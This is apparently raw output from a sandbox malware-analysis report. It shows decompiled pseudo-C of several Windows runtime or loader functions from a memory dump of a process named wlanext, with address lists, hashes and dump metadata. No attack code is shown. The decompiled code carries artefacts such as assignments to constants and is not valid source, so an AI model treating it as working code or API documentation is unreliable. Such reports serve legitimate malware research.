				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x35dd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0352D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03502280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03504620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0352F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E034FFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x35db1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0352B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                  0x03515142
                                  0x0351514c
                                  0x03515150
                                  0x03515157
                                  0x03515159
                                  0x0351515e
                                  0x03515165
                                  0x03515169
                                  0x0351516c
                                  0x03515172
                                  0x03515176
                                  0x0351517a
                                  0x0351517a
                                  0x0351517a
                                  0x0351517f
                                  0x03556d8b
                                  0x03556d8e
                                  0x03556d91
                                  0x03556d95
                                  0x03556d98
                                  0x03556d9c
                                  0x03556da0
                                  0x03556da3
                                  0x03556da7
                                  0x03556e26
                                  0x03556e26
                                  0x03556e2a
                                  0x035151f9
                                  0x035151f9
                                  0x035151fe
                                  0x03556e33
                                  0x03556e33
                                  0x03556e39
                                  0x03556e3d
                                  0x03556e46
                                  0x03556e50
                                  0x00000000
                                  0x00000000
                                  0x03556e52
                                  0x03556e53
                                  0x03556e56
                                  0x03556e5d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03556e5f
                                  0x03556e67
                                  0x03556e77
                                  0x03556e7f
                                  0x03556e80
                                  0x03556e88
                                  0x03556e90
                                  0x03556e9f
                                  0x03556ea5
                                  0x03556ea9
                                  0x03556eb1
                                  0x03556ebf
                                  0x00000000
                                  0x00000000
                                  0x03556ecf
                                  0x03556ed3
                                  0x00000000
                                  0x00000000
                                  0x03556edb
                                  0x03556ede
                                  0x03556ee1
                                  0x03556ee8
                                  0x03556eeb
                                  0x03556eed
                                  0x03556ef0
                                  0x03556ef4
                                  0x03556ef8
                                  0x03556efc
                                  0x00000000
                                  0x00000000
                                  0x03556f0d
                                  0x03556f11
                                  0x03556f32
                                  0x03556f37
                                  0x03556f3b
                                  0x03556f3e
                                  0x03556f41
                                  0x03556f46
                                  0x00000000
                                  0x00000000
                                  0x03556f4c
                                  0x03556f50
                                  0x03556f50
                                  0x03556f54
                                  0x03556f62
                                  0x03556f65
                                  0x03556f6d
                                  0x03556f7b
                                  0x03556f7b
                                  0x03556f93
                                  0x03556f98
                                  0x03556fa0
                                  0x03556fa6
                                  0x03556fb3
                                  0x03556fb6
                                  0x03556fbf
                                  0x03556fc1
                                  0x03556fd5
                                  0x03556fda
                                  0x03556fda
                                  0x03556fdd
                                  0x03556fe2
                                  0x03556fe7
                                  0x03556feb
                                  0x03556fef
                                  0x03556ff3
                                  0x0351520c
                                  0x0351520c
                                  0x0351520f
                                  0x03515215
                                  0x03515234
                                  0x0351523a
                                  0x0351523a
                                  0x03515244
                                  0x03515245
                                  0x03515246
                                  0x03515251
                                  0x03515251
                                  0x03556f13
                                  0x03556f17
                                  0x03556f17
                                  0x03556f18
                                  0x03556f1b
                                  0x03556f1f
                                  0x03556f23
                                  0x00000000
                                  0x03556f28
                                  0x03515204
                                  0x03515204
                                  0x03515208
                                  0x00000000
                                  0x03515208
                                  0x03515185
                                  0x03515188
                                  0x0351518a
                                  0x0351518e
                                  0x03515195
                                  0x03556db1
                                  0x03556db5
                                  0x03556db9
                                  0x0351519b
                                  0x0351519b
                                  0x0351519e
                                  0x035151a7
                                  0x035151a9
                                  0x035151a9
                                  0x035151b5
                                  0x035151b8
                                  0x035151bb
                                  0x035151be
                                  0x035151c1
                                  0x035151c5
                                  0x035151c9
                                  0x035151cd
                                  0x035151cd
                                  0x035151d8
                                  0x035151dc
                                  0x035151e0
                                  0x03556dcc
                                  0x03556dd0
                                  0x03556dd5
                                  0x03556ddd
                                  0x03556de1
                                  0x03556de1
                                  0x03556de5
                                  0x03556deb
                                  0x03556df1
                                  0x03556df7
                                  0x03556dfd
                                  0x03556e01
                                  0x03556e05
                                  0x03556e09
                                  0x03556e0d
                                  0x03556e11
                                  0x03556e11
                                  0x035151eb
                                  0x03556e1a
                                  0x03556e1f
                                  0x03556e21
                                  0x03556e23
                                  0x00000000
                                  0x035151f1
                                  0x035151f1
                                  0x00000000
                                  0x035151f1

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c8dab29fbc0fe5aa9755c83d04d53cafc81ad4efe88582ecc8a231a92df92ac0
                                  • Instruction ID: cc2ce256a46a39ad8e35fc37aecdd5c95dface42b892c4e7a05d114519e581d6
                                  • Opcode Fuzzy Hash: c8dab29fbc0fe5aa9755c83d04d53cafc81ad4efe88582ecc8a231a92df92ac0
                                  • Instruction Fuzzy Hash: 9DC142755093818FD354CF28D490A5AFBF1BF89304F184A6EF89A8B3A2D771E845CB42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035103E2 Relevance: .3, Instructions: 254COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E035103E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x35dd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03510548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0352B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E034FB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x35d7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03507D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03507D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03567016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03529830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E035669A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x35d7c04 != 0) {
						_t118 = _v12;
						_t120 = E0356A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x35d7bd8;
						if( *0x35d7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E035295D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E035299A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03563540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E034EB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0352AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x35d8474 - 3;
										if( *0x35d8474 != 3) {
											 *0x35d79dc =  *0x35d79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03507D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03507D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03567016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x35d8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x35d7b00; // 0x0
							asm("ror esi, cl");
							 *0x35db1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E035295D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E034F7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                  0x035103f1
                                  0x035103f7
                                  0x035103f9
                                  0x035103fb
                                  0x035103fd
                                  0x03510400
                                  0x0351040a
                                  0x03554c7a
                                  0x03510537
                                  0x03510547
                                  0x03510410
                                  0x03510410
                                  0x03510414
                                  0x03510417
                                  0x0351041a
                                  0x03510421
                                  0x03510424
                                  0x0351042b
                                  0x0351043b
                                  0x0351043e
                                  0x0351043f
                                  0x0351043f
                                  0x03510446
                                  0x03510449
                                  0x0351044c
                                  0x0351044f
                                  0x03510459
                                  0x03554c8d
                                  0x0351045f
                                  0x0351045f
                                  0x0351045f
                                  0x03510467
                                  0x03554c97
                                  0x03554c9d
                                  0x03554ca4
                                  0x03554caa
                                  0x03554caf
                                  0x03554cb1
                                  0x03554cc3
                                  0x03554cb3
                                  0x03554cbc
                                  0x03554cbc
                                  0x03554cc8
                                  0x03554ccb
                                  0x03554cd7
                                  0x03554cda
                                  0x03554cdf
                                  0x03554cdf
                                  0x03554ccb
                                  0x03554ca4
                                  0x0351046d
                                  0x0351046f
                                  0x0351046f
                                  0x03510471
                                  0x03510476
                                  0x0351047a
                                  0x0351047b
                                  0x03510483
                                  0x03510489
                                  0x0351048d
                                  0x00000000
                                  0x00000000
                                  0x03554ce9
                                  0x03554cef
                                  0x03554d22
                                  0x03554d22
                                  0x00000000
                                  0x03554d22
                                  0x03554cf1
                                  0x03554cf7
                                  0x00000000
                                  0x00000000
                                  0x03554cf9
                                  0x03554cff
                                  0x00000000
                                  0x00000000
                                  0x03554d05
                                  0x03554d07
                                  0x00000000
                                  0x00000000
                                  0x03554d0d
                                  0x03554d0f
                                  0x03554d14
                                  0x03554d16
                                  0x00000000
                                  0x00000000
                                  0x03554d1c
                                  0x03554d1c
                                  0x03510499
                                  0x03510535
                                  0x03510535
                                  0x00000000
                                  0x03510535
                                  0x035104a6
                                  0x03554d2c
                                  0x03554d37
                                  0x03554d39
                                  0x03554d3b
                                  0x00000000
                                  0x00000000
                                  0x03554d41
                                  0x03554d48
                                  0x03510527
                                  0x0351052b
                                  0x0351052d
                                  0x03510530
                                  0x03510530
                                  0x00000000
                                  0x0351052b
                                  0x03554d4e
                                  0x035104ac
                                  0x035104ac
                                  0x035104af
                                  0x035104b2
                                  0x035104b7
                                  0x035104b9
                                  0x035104bb
                                  0x035104bd
                                  0x035104bf
                                  0x035104c5
                                  0x035104c9
                                  0x03554d53
                                  0x03554d59
                                  0x03554db9
                                  0x03554dba
                                  0x03554dbf
                                  0x03554dc2
                                  0x03554dc4
                                  0x03554dc7
                                  0x03554dce
                                  0x00000000
                                  0x03554dce
                                  0x03554d5b
                                  0x03554d61
                                  0x00000000
                                  0x00000000
                                  0x03554d63
                                  0x03554d69
                                  0x00000000
                                  0x00000000
                                  0x03554d6b
                                  0x03554d6e
                                  0x03554d74
                                  0x03554d76
                                  0x03554d7c
                                  0x03554d7e
                                  0x03554d84
                                  0x03554d89
                                  0x03554d8c
                                  0x03554d8d
                                  0x03554d92
                                  0x03554d95
                                  0x03554d96
                                  0x03554d98
                                  0x03554d9a
                                  0x03554d9f
                                  0x03554da4
                                  0x03554da6
                                  0x03554da8
                                  0x03554daf
                                  0x03554db1
                                  0x03554db1
                                  0x03554daf
                                  0x03554da6
                                  0x03554d84
                                  0x03554d7c
                                  0x00000000
                                  0x03554d74
                                  0x035104d6
                                  0x03554de1
                                  0x035104dc
                                  0x035104dc
                                  0x035104dc
                                  0x035104e4
                                  0x03554deb
                                  0x03554df1
                                  0x03554df8
                                  0x03554dfe
                                  0x03554e03
                                  0x03554e05
                                  0x03554e17
                                  0x03554e07
                                  0x03554e10
                                  0x03554e10
                                  0x03554e1c
                                  0x03554e1f
                                  0x03554e35
                                  0x03554e35
                                  0x03554e1f
                                  0x03554df8
                                  0x035104f1
                                  0x035104fa
                                  0x03554e3f
                                  0x03554e47
                                  0x03554e5b
                                  0x03554e61
                                  0x03554e67
                                  0x03554e69
                                  0x03554e71
                                  0x03554e73
                                  0x03510500
                                  0x03510500
                                  0x03510500
                                  0x035104fa
                                  0x03510508
                                  0x0351051d
                                  0x0351051d
                                  0x0351051f
                                  0x03510524
                                  0x00000000
                                  0x03510524
                                  0x03510515
                                  0x03510517
                                  0x03554e7a
                                  0x03554e7c
                                  0x00000000
                                  0x00000000
                                  0x03554e85
                                  0x00000000
                                  0x03554e85
                                  0x00000000
                                  0x03510517

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fb52f0856d7413266f606624d204cbb7a06d8e175dfc193940ec36424cc7afa
                                  • Instruction ID: b639ee1771721c4d5fbca3476cdb9f7fee279b77dc2a7e492b0c586ada5ab28d
                                  • Opcode Fuzzy Hash: 7fb52f0856d7413266f606624d204cbb7a06d8e175dfc193940ec36424cc7afa
                                  • Instruction Fuzzy Hash: EF912471E003159FEB31DA69E854BADBBB4BB45724F0A0266FD11AB2F0D774AC90C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034EC600 Relevance: .2, Instructions: 225COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E034EC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x35dd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E034F6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0352B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x35d7b9c; // 0x0
					_t74 = L03504620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03529650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L035077F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0352F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E035213C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L035077F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03529650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                  0x034ec608
